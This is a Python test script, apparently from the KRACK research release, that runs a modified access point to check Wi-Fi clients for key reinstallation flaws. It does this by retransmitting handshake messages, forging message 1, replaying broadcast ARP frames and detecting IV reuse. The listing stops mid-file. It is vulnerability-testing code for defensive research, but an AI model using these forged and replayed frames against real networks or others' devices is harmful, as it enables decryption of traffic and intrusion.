krack-test-client.py 29 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. import sys, socket, struct, time, subprocess, atexit, select
  11. from datetime import datetime
  12. from wpaspy import Ctrl
  13. from Cryptodome.Cipher import AES
  14. # FIXME: We are repeating the "disable hw encryption" of FT tests
  15. USAGE = """{name} - Tool to test Key Reinstallation Attacks against clients
  16. To test wheter a client is vulnerable to Key Reinstallation Attack against
  17. the 4-way handshake or group key handshake, take the following steps:
  18. 1. Compile our modified hostapd instance. This only needs to be done once.
  19. cd ../hostapd
  20. cp defconfig .config
  21. make -j 2
  22. 2. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  23. with our script. So disable hardware encryption by executing:
  24. cd ../krackattack/
  25. ./disable-hwcrypto.sh
  26. This only needs to be done once. It's recommended to reboot after executing
  27. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  28. or similar to confirm the nohwcript/.. param has been set. We tested this
  29. script with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N.
  30. 3. Execute this script. Accepted parameters are:
  31. --group Test the group key handshake instead of the 4-way handshake
  32. --debug Show more debug messages
  33. --tptk See step 5 (forge Msg1/4 with replayed ANonce before Msg3/4)
  34. --tptk-rand See step 5 (forge Msg1/4 with random ANonce before Msg3/4)
  35. All other supplied arguments are passed on to hostapd.
  36. The only two commands you will normally have to execute are:
  37. {name}
  38. {name} --group
  39. The first one tests for key reinstallations in the 4-way handshake (see
  40. step 4), and the second tests one for key reinstallations in the group key
  41. handshake (see step 5).
  42. !! The default network name is testnetwork with password abcdefgh !!
  43. Note that you can change settings of the AP by modifying hostapd.conf.
  44. You will probably have to edit the line `interface=` to specify the
  45. correct Wi-Fi interface to use for the AP.
  46. 4. To test key reinstallations in the 4-way handshake, the script will keep
  47. sending encrypted message 3's to the client. To start the script execute:
  48. {name}
  49. Connect the the AP and the following tests will be performed automatically:
  50. 4a. The script monitors traffic sent by the client to see if the pairwise
  51. key is being reinstalled. To assure the client is sending enough frames,
  52. you can optionally ping the AP: ping 192.168.100.254 .
  53. If the client is vulnerable, the script will show something like:
  54. [19:02:37] 78:31:c1:c4:88:92: IV reuse detected (IV=1, seq=10). Client is vulnerable to pairwise key reinstallations in the 4-way handshake!
  55. If the client is patched, the script will show (this can take a minute):
  56. [18:58:11] 90:18:7c:6e:6b:20: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake.
  57. 4b. Once the client has requested an IP using DHCP, the script tests for
  58. reinstallations of the group key by sending broadcast ARP requests to the
  59. client using an already used (replayed) packet number (= IV). The client
  60. *must* request an IP using DHCP for this test to start.
  61. If the client is vulnerable, the script will show something like:
  62. [19:03:08] 78:31:c1:c4:88:92: Received 5 unique replies to replayed broadcast ARP requests. Client is vulnerable to group
  63. [19:03:08] key reinstallations in the 4-way handshake (or client accepts replayed broadcast frames)!
  64. If the client is patched, the script will show (this can take a minute):
  65. [19:03:08] 78:31:c1:c4:88:92: client DOESN'T seem vulnerable to group key reinstallation in the 4-way handshake handshake.
  66. Note that this scripts *indirectly* tests for reinstallations of the group
  67. key, by testing if replayed broadcast frames are accepted by the client.
  68. 5. Some supplicants (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise
  69. key reinstallations in the 4-way handshake when a forged message 1 is
  70. injected before sending a retransmitted message 3. To test for this variant
  71. of the attack, you can execute:
  72. {name} --tptk # Inject message 1 with a replayed ANonce
  73. {name} --tptk-rand # Inject message 1 with a random ANonce
  74. Now follow the same steps as in step 4 to see if a supplicant is vulnerable.
  75. Try both these attack variants after running the normal tests of step 4.
  76. 6. To test key reinstallations in the group key handshake, the script will keep
  77. performing new group key handshakes using an identical (static) group key.
  78. The client *must* request an IP using DHCP for this test to start. To start
  79. the script execute:
  80. {name} --group
  81. Connect the the AP and all tests will be performed automatically. The
  82. working and output of the script is now similar as in step 4b.
  83. 7. Some final recommendations:
  84. 6a. Perform these tests in a room with little interference. A high amount
  85. of packet loss will make this script unreliable!
  86. 6b. Manually inspect network traffic to confirm the output of the script:
  87. - Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls
  88. by monitoring the IVs of frames sent by the client.
  89. - Capture traffic on the client to see if the replayed broadcast ARP
  90. requests are accepted or not.
  91. 6c. If the client being tested can use multiple Wi-Fi radios/NICs, test
  92. using a few different ones.
  93. """
  94. # FIXME:
  95. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  96. # - We should test decryption using an all-zero key, and warn if this seems to succeed
  97. # Future work:
  98. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  99. # - Ability to test the group key handshake against specific clients only
  100. # - Individual test to see if the client accepts replayed broadcast traffic (without performing key reinstallation)
  101. # After how many seconds a new message 3, or new group key message 1, is sent.
  102. # This value must match the one in `../src/ap/wpa_auth.c` (same variable name).
  103. HANDSHAKE_TRANSMIT_INTERVAL = 2
  104. #### Basic output and logging functionality ####
  105. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  106. COLORCODES = { "gray" : "\033[0;37m",
  107. "green" : "\033[0;32m",
  108. "orange": "\033[0;33m",
  109. "red" : "\033[0;31m" }
  110. global_log_level = INFO
  111. def log(level, msg, color=None, showtime=True):
  112. if level < global_log_level: return
  113. if level == DEBUG and color is None: color="gray"
  114. if level == WARNING and color is None: color="orange"
  115. if level == ERROR and color is None: color="red"
  116. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  117. #### Utility Commands ####
  118. def hostapd_command(hostapd_ctrl, cmd):
  119. rval = hostapd_ctrl.request(cmd)
  120. if "UNKNOWN COMMAND" in rval:
  121. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  122. quit(1)
  123. return rval
  124. #### Packet Processing Functions ####
  125. class DHCP_sock(DHCP_am):
  126. def __init__(self, **kwargs):
  127. self.sock = kwargs.pop("sock")
  128. super(DHCP_am, self).__init__(**kwargs)
  129. def send_reply(self, reply):
  130. self.sock.send(reply, **self.optsend)
  131. def print_reply(self, req, reply):
  132. log(STATUS, "%s: DHCP reply %s to %s" % (reply.getlayer(Ether).dst, reply.getlayer(IP).dst, reply.dst), color="green")
  133. def remove_client(self, clientmac):
  134. clientip = self.leases[clientmac]
  135. self.pool.append(clientip)
  136. del self.leases[clientmac]
  137. class ARP_sock(ARP_am):
  138. def __init__(self, **kwargs):
  139. self.sock = kwargs.pop("sock")
  140. super(ARP_am, self).__init__(**kwargs)
  141. def send_reply(self, reply):
  142. self.sock.send(reply, **self.optsend)
  143. def print_reply(self, req, reply):
  144. log(STATUS, "%s: ARP: %s ==> %s on %s" % (reply.getlayer(Ether).dst, req.summary(), reply.summary(), self.iff))
  145. class MitmSocket(L2Socket):
  146. def __init__(self, **kwargs):
  147. super(MitmSocket, self).__init__(**kwargs)
  148. def send(self, p):
  149. # Hack: set the More Data flag so we can detect injected frames (and so clients stay awake longer)
  150. p[Dot11].FCfield |= 0x20
  151. L2Socket.send(self, RadioTap()/p)
  152. def _strip_fcs(self, p):
  153. # Scapy can't handle the optional Frame Check Sequence (FCS) field automatically
  154. if p[RadioTap].present & 2 != 0:
  155. rawframe = str(p[RadioTap])
  156. pos = 8
  157. while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
  158. # If the TSFT field is present, it must be 8-bytes aligned
  159. if p[RadioTap].present & 1 != 0:
  160. pos += (8 - (pos % 8))
  161. pos += 8
  162. # Remove FCS if present
  163. if ord(rawframe[pos]) & 0x10 != 0:
  164. return Dot11(str(p[Dot11])[:-4])
  165. return p[Dot11]
  166. def recv(self, x=MTU):
  167. p = L2Socket.recv(self, x)
  168. if p == None or not Dot11 in p: return None
  169. # Hack: ignore frames that we just injected and are echoed back by the kernel
  170. if p[Dot11].FCfield & 0x20 != 0:
  171. return None
  172. # Strip the FCS if present, and drop the RadioTap header
  173. return self._strip_fcs(p)
  174. def close(self):
  175. super(MitmSocket, self).close()
  176. def dot11_get_seqnum(p):
  177. return p[Dot11].SC >> 4
  178. def dot11_get_iv(p):
  179. """Scapy can't handle Extended IVs, so do this properly ourselves (only works for CCMP)"""
  180. wep = p[Dot11WEP]
  181. if wep.keyid & 32:
  182. # FIXME: Only CCMP is supported (TKIP uses a different IV structure)
  183. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack(">I", wep.wepdata[0:4])[0] << 16)
  184. else:
  185. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)
  186. def dot11_get_priority(p):
  187. if not Dot11QoS in p: return 0
  188. return ord(str(p[Dot11QoS])[0])
  189. def get_ccmp_payload(p):
  190. # Extract encrypted payload:
  191. # - Skip extended IV (4 bytes in total)
  192. # - Exclude first 4 bytes of the CCMP MIC (note that last 4 are saved in the WEP ICV field)
  193. return str(p.wepdata[4:-4])
  194. def decrypt_ccmp(p, key):
  195. payload = get_ccmp_payload(p)
  196. sendermac = p[Dot11].addr2
  197. priority = dot11_get_priority(p)
  198. iv = dot11_get_iv(p)
  199. pn = struct.pack(">I", iv >> 16) + struct.pack(">H", iv & 0xFFFF)
  200. nonce = chr(priority) + sendermac.replace(':','').decode("hex") + pn
  201. cipher = AES.new(key, AES.MODE_CCM, nonce, mac_len=8)
  202. plaintext = cipher.decrypt(payload)
  203. return plaintext
  204. #### Main Testing Code ####
  205. class IvInfo():
  206. def __init__(self, p):
  207. self.iv = dot11_get_iv(p)
  208. self.seq = dot11_get_seqnum(p)
  209. self.time = p.time
  210. def is_reused(self, p):
  211. """Check if frame p reuses an IV and is not a retransmitted frame"""
  212. iv = dot11_get_iv(p)
  213. seq = dot11_get_seqnum(p)
  214. return self.iv == iv and self.seq != seq and p.time >= self.time + 1
  215. class ClientState():
  216. UNKNOWN, VULNERABLE, PATCHED = range(3)
  217. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  218. def __init__(self, clientmac, test_group_hs=False, test_tptk=False):
  219. self.mac = clientmac
  220. self.TK = None
  221. self.vuln_4way = ClientState.UNKNOWN
  222. self.vuln_group = ClientState.UNKNOWN
  223. # FIXME: Separate variable for group handshake result?
  224. self.ivs = dict() # maps IV values to IvInfo objects
  225. self.pairkey_sent_time_prev_iv = None
  226. self.pairkey_intervals_no_iv_reuse = 0
  227. self.pairkey_tptk = test_tptk
  228. self.groupkey_reset()
  229. self.groupkey_grouphs = test_group_hs
  230. def groupkey_reset(self):
  231. self.groupkey_state = ClientState.IDLE
  232. self.groupkey_prev_canary_time = 0
  233. self.groupkey_num_canaries = 0
  234. self.groupkey_requests_sent = 0
  235. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  236. def start_grouphs_test():
  237. self.groupkey_reset()
  238. self.groupkey_grouphs = True
  239. def get_encryption_key(self, hostapd_ctrl):
  240. if self.TK is None:
  241. # Clear old replies and messages from the hostapd control interface
  242. while hostapd_ctrl.pending():
  243. hostapd_ctrl.recv()
  244. # Contact our modified Hostapd instance to request the pairwise key
  245. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  246. if not "FAIL" in response:
  247. self.TK = response.strip().decode("hex")
  248. return self.TK
  249. def decrypt(self, p, hostapd_ctrl):
  250. payload = get_ccmp_payload(p)
  251. llcsnap, packet = payload[:8], payload[8:]
  252. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  253. # On some kernels, the virtual interface associated to the real AP interface will return
  254. # frames where the payload is already decrypted (this happens when hardware decryption is
  255. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  256. plaintext = payload
  257. else:
  258. key = self.get_encryption_key(hostapd_ctrl)
  259. plaintext = decrypt_ccmp(p, key)
  260. # If it still fails, try an all-zero key
  261. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  262. plaintext = decrypt_ccmp(p, "\x00" * 16)
  263. return plaintext
  264. def track_used_iv(self, p):
  265. iv = dot11_get_iv(p)
  266. self.ivs[iv] = IvInfo(p)
  267. def is_iv_reused(self, p):
  268. """Returns True if this is an *observed* IV reuse and not just a retransmission"""
  269. iv = dot11_get_iv(p)
  270. return iv in self.ivs and self.ivs[iv].is_reused(p)
  271. def is_new_iv(self, p):
  272. """Returns True if the IV in this frame is higher than all previously observed ones"""
  273. iv = dot11_get_iv(p)
  274. if len(self.ivs) == 0: return True
  275. return iv > max(self.ivs.keys())
  276. def check_pairwise_reinstall(self, p):
  277. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  278. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  279. if self.is_iv_reused(p):
  280. if self.vuln_4way != ClientState.VULNERABLE:
  281. iv = dot11_get_iv(p)
  282. seq = dot11_get_seqnum(p)
  283. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  284. "Client is vulnerable to pairwise key reinstallations in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  285. self.vuln_4way = ClientState.VULNERABLE
  286. # If it's a higher IV than all previous ones, try to check if the client seems patched
  287. elif self.vuln_4way == ClientState.UNKNOWN and self.is_new_iv(p):
  288. # Save how many intervals we received a data packet without IV reset. Use twice the
  289. # transmission interval of message 3, in case one message 3 is lost due to noise.
  290. if self.pairkey_sent_time_prev_iv is None:
  291. self.pairkey_sent_time_prev_iv = p.time
  292. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  293. self.pairkey_intervals_no_iv_reuse += 1
  294. self.pairkey_sent_time_prev_iv = p.time
  295. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  296. # If during several intervals all IV reset attempts failed, the client is likely patched.
  297. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  298. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  299. self.vuln_4way = ClientState.PATCHED
  300. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  301. msg = "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake"
  302. if self.pairkey_tptk == KRAckAttackClient.TPTK_NONE:
  303. msg += " (using standard attack)"
  304. elif self.pairkey_tptk == KRAckAttackClient.TPTK_REPLAY:
  305. msg += " (using TPTK attack)"
  306. elif self.pairkey_tptk == KRAckAttackClient.TPTK_RAND:
  307. msg += " (using TPTK-RAND attack)"
  308. log(INFO, (msg + ".") % self.mac, color="green")
  309. def mark_allzero_key(self, p):
  310. if self.vuln_4way != ClientState.VULNERABLE:
  311. iv = dot11_get_iv(p)
  312. seq = dot11_get_seqnum(p)
  313. log(INFO, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  314. "Client is vulnerable to (re)installation of an all-zero key in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  315. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this first !!!" % self.mac)
  316. self.vuln_4way = ClientState.VULNERABLE
  317. def groupkey_handle_canary(self, p):
  318. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  319. # Must be testing this client, and must not be a benign retransmission
  320. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  321. if self.groupkey_prev_canary_time + 1 > p.time: return
  322. self.groupkey_num_canaries += 1
  323. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.groupkey_num_canaries))
  324. # We wait for several replies before marking the client as vulnerable, because
  325. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  326. if self.groupkey_num_canaries >= 5:
  327. assert self.vuln_group != ClientState.VULNERABLE
  328. log(INFO, "%s: Received %d unique replies to replayed broadcast ARP requests. Client is vulnerable to group" \
  329. % (self.mac, self.groupkey_num_canaries), color="green")
  330. log(INFO, " key reinstallations in the %s handshake (or client accepts replayed broadcast frames)!" \
  331. % ("group key" if self.groupkey_grouphs else "4-way"), color="green")
  332. self.vuln_group = ClientState.VULNERABLE
  333. self.groupkey_state = ClientState.FINISHED
  334. # Remember that we got a reply this interval (see groupkey_track_request to detect patched clients)
  335. else:
  336. self.groupkey_state = ClientState.GOT_CANARY
  337. self.groupkey_prev_canary_time = p.time
  338. def groupkey_track_request(self):
  339. """Track when we went broadcast ARP requests, and determine if a client seems patched"""
  340. if self.vuln_group != ClientState.UNKNOWN: return
  341. hstype = "group key" if self.groupkey_grouphs else "4-way"
  342. # Show a message when we started with testing the client
  343. if self.groupkey_state == ClientState.IDLE:
  344. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (self.mac, hstype))
  345. self.groupkey_state = ClientState.STARTED
  346. if self.groupkey_requests_sent == 4:
  347. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  348. if self.groupkey_state == ClientState.GOT_CANARY:
  349. log(DEBUG, "%s: got a reply to broadcast ARP during this interval" % self.mac)
  350. self.groupkey_state = ClientState.STARTED
  351. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  352. elif self.groupkey_state == ClientState.STARTED:
  353. self.groupkey_patched_intervals += 1
  354. log(DEBUG, "%s: no group IV resets seem to have occured for %d interval(s)" % (self.mac, self.groupkey_patched_intervals))
  355. self.groupkey_state = ClientState.STARTED
  356. self.groupkey_requests_sent = 0
  357. # If the client appears secure for several intervals (see above), it's likely patched
  358. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  359. log(INFO, "%s: client DOESN'T seem vulnerable to group key reinstallation in the %s handshake." % (self.mac, hstype), color="green")
  360. self.vuln_group = ClientState.PATCHED
  361. self.groupkey_state = ClientState.FINISHED
  362. self.groupkey_requests_sent += 1
  363. log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
  364. class KRAckAttackClient():
  365. TPTK_NONE, TPTK_REPLAY, TPTK_RAND = range(3)
  366. def __init__(self, interface):
  367. self.nic_iface = interface
  368. self.nic_mon = interface + "mon"
  369. self.test_grouphs = False
  370. self.test_tptk = KRAckAttackClient.TPTK_NONE
  371. try:
  372. self.apmac = scapy.arch.get_if_hwaddr(interface)
  373. except:
  374. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  375. raise
  376. self.sock_mon = None
  377. self.sock_eth = None
  378. self.hostapd = None
  379. self.hostapd_ctrl = None
  380. self.dhcp = None
  381. self.group_ip = None
  382. self.group_arp = None
  383. self.clients = dict()
  384. def reset_client_info(self, clientmac):
  385. if clientmac in self.dhcp.leases:
  386. self.dhcp.remove_client(clientmac)
  387. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  388. if clientmac in self.clients:
  389. del self.clients[clientmac]
  390. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  391. def handle_replay(self, p):
  392. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  393. function processes these frames manually so we can still test reinstallations of the group key."""
  394. if not Dot11WEP in p: return
  395. # Reconstruct Ethernet header
  396. clientmac = p.addr2
  397. header = Ether(dst=self.apmac, src=clientmac)
  398. header.time = p.time
  399. # Decrypt the payload and obtain LLC/SNAP header and packet content
  400. client = self.clients[clientmac]
  401. plaintext = client.decrypt(p, self.hostapd_ctrl)
  402. llcsnap, packet = plaintext[:8], plaintext[8:]
  403. # Rebuild the full Ethernet packet
  404. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  405. decap = header/ARP(packet)
  406. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  407. decap = header/IP(packet)
  408. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  409. decap = header/IPv6(packet)
  410. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  411. # # EAPOL
  412. else:
  413. return
  414. # Now process the packet as if it were a valid (non-replayed) one
  415. self.process_eth_rx(decap)
  416. def handle_mon_rx(self):
  417. p = self.sock_mon.recv()
  418. if p == None: return
  419. if p.type == 1: return
  420. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  421. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  422. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  423. # The first bit in FCfield is set if the frames is "to-DS"
  424. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  425. if apmac != self.apmac: return None
  426. # Reset info about disconnected clients
  427. if Dot11Deauth in p or Dot11Disas in p:
  428. self.reset_client_info(clientmac)
  429. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  430. elif p.addr1 == self.apmac and Dot11WEP in p:
  431. if not clientmac in self.clients:
  432. self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs, test_tptk=self.test_tptk)
  433. client = self.clients[clientmac]
  434. iv = dot11_get_iv(p)
  435. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  436. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  437. client.mark_allzero_key(p)
  438. if not self.test_grouphs:
  439. client.check_pairwise_reinstall(p)
  440. if client.is_iv_reused(p):
  441. self.handle_replay(p)
  442. client.track_used_iv(p)
  443. def process_eth_rx(self, p):
  444. self.dhcp.reply(p)
  445. self.group_arp.reply(p)
  446. clientmac = p[Ether].src
  447. if not clientmac in self.clients: return
  448. client = self.clients[clientmac]
  449. if ARP in p and p[ARP].pdst == self.group_ip:
  450. client.groupkey_handle_canary(p)
  451. def handle_eth_rx(self):
  452. p = self.sock_eth.recv()
  453. if p == None or not Ether in p: return
  454. self.process_eth_rx(p)
  455. def configure_interfaces(self):
  456. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  457. # 0. Some users may forget this otherwise
  458. subprocess.check_output(["rfkill", "unblock", "wifi"])
  459. # 1. Remove unused virtual interfaces to start from a clean state
  460. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  461. # 2. Configure monitor mode on interfaces
  462. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  463. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  464. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  465. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  466. time.sleep(0.5)
  467. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  468. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  469. def run(self, test_grouphs=False, test_tptk=False):
  470. self.configure_interfaces()
  471. # Open the patched hostapd instance that carries out tests and let it start
  472. log(STATUS, "Starting hostapd ...")
  473. self.hostapd = subprocess.Popen(["../hostapd/hostapd", "hostapd.conf"] + sys.argv[1:])
  474. time.sleep(1)
  475. try:
  476. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  477. self.hostapd_ctrl.attach()
  478. except:
  479. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  480. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  481. raise
  482. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  483. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  484. # Let scapy handle DHCP requests
  485. self.dhcp = DHCP_sock(sock=self.sock_eth,
  486. domain='krackattack.com',
  487. pool=Net('192.168.100.0/24'),
  488. network='192.168.100.0/24',
  489. gw='192.168.100.254',
  490. renewal_time=600, lease_time=3600)
  491. # Configure gateway IP: reply to ARP and ping requests
  492. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  493. # Use a dedicated IP address for our broadcast ARP requests and replies
  494. self.group_ip = self.dhcp.pool.pop()
  495. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  496. # If applicable, inform hostapd that we are testing the group key handshake
  497. if test_grouphs:
  498. hostapd_command(self.hostapd_ctrl, "START_GROUP_TESTS")
  499. self.test_grouphs = True
  500. # If applicable, inform hostapd that we are testing for Temporal PTK (TPTK) construction behaviour
  501. self.test_tptk = test_tptk
  502. if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
  503. hostapd_command(self.hostapd_ctrl, "TEST_TPTK")
  504. elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
  505. hostapd_command(self.hostapd_ctrl, "TEST_TPTK_RAND")
  506. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  507. # Monitor both the normal interface and virtual monitor interface of the AP
  508. self.next_arp = time.time() + 1
  509. while True:
  510. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  511. if self.sock_mon in sel[0]: self.handle_mon_rx()
  512. if self.sock_eth in sel[0]: self.handle_eth_rx()
  513. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  514. if time.time() > self.next_arp:
  515. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  516. for client in self.clients.values():
  517. # Also keep injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
  518. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  519. clientip = self.dhcp.leases[client.mac]
  520. client.groupkey_track_request()
  521. log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
  522. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  523. self.sock_eth.send(request)
  524. def stop(self):
  525. log(STATUS, "Closing hostapd and cleaning up ...")
  526. if self.hostapd:
  527. self.hostapd.terminate()
  528. self.hostapd.wait()
  529. if self.sock_mon: self.sock_mon.close()
  530. if self.sock_eth: self.sock_eth.close()
  531. def cleanup():
  532. attack.stop()
  533. def argv_get_interface():
  534. for i in range(len(sys.argv)):
  535. if not sys.argv[i].startswith("-i"):
  536. continue
  537. if len(sys.argv[i]) > 2:
  538. return sys.argv[i][2:]
  539. else:
  540. return sys.argv[i + 1]
  541. return None
  542. def argv_pop_argument(argument):
  543. if not argument in sys.argv: return False
  544. idx = sys.argv.index(argument)
  545. del sys.argv[idx]
  546. return True
  547. def hostapd_read_config(config):
  548. # Read the config, get the interface name, and verify some settings.
  549. interface = None
  550. with open(config) as fp:
  551. for line in fp.readlines():
  552. line = line.strip()
  553. if line.startswith("interface="):
  554. interface = line.split('=')[1]
  555. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  556. if "TKIP" in line:
  557. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  558. log(ERROR, " >%s<" % line, showtime=False)
  559. quit(1)
  560. # Parameter -i overrides interface in config.
  561. # FIXME: Display warning when multiple interfaces are used.
  562. if argv_get_interface() is not None:
  563. interface = argv_get_interface()
  564. return interface
  565. if __name__ == "__main__":
  566. if "--help" in sys.argv or "-h" in sys.argv:
  567. print USAGE.format(name=sys.argv[0])
  568. quit(1)
  569. test_grouphs = argv_pop_argument("--group")
  570. test_tptk_replay = argv_pop_argument("--tptk")
  571. test_tptk_rand = argv_pop_argument("--tptk-rand")
  572. while argv_pop_argument("--debug"):
  573. global_log_level -= 1
  574. test_tptk = KRAckAttackClient.TPTK_NONE
  575. if test_tptk_replay and test_tptk_rand:
  576. log(ERROR, "Please only specify --tptk or --tptk-rand")
  577. elif test_tptk_replay:
  578. test_tptk = KRAckAttackClient.TPTK_REPLAY
  579. elif test_tptk_rand:
  580. test_tptk = KRAckAttackClient.TPTK_RAND
  581. try:
  582. interface = hostapd_read_config("hostapd.conf")
  583. except Exception as ex:
  584. log(ERROR, "Failed to parse the hostapd.conf config file")
  585. raise
  586. if not interface:
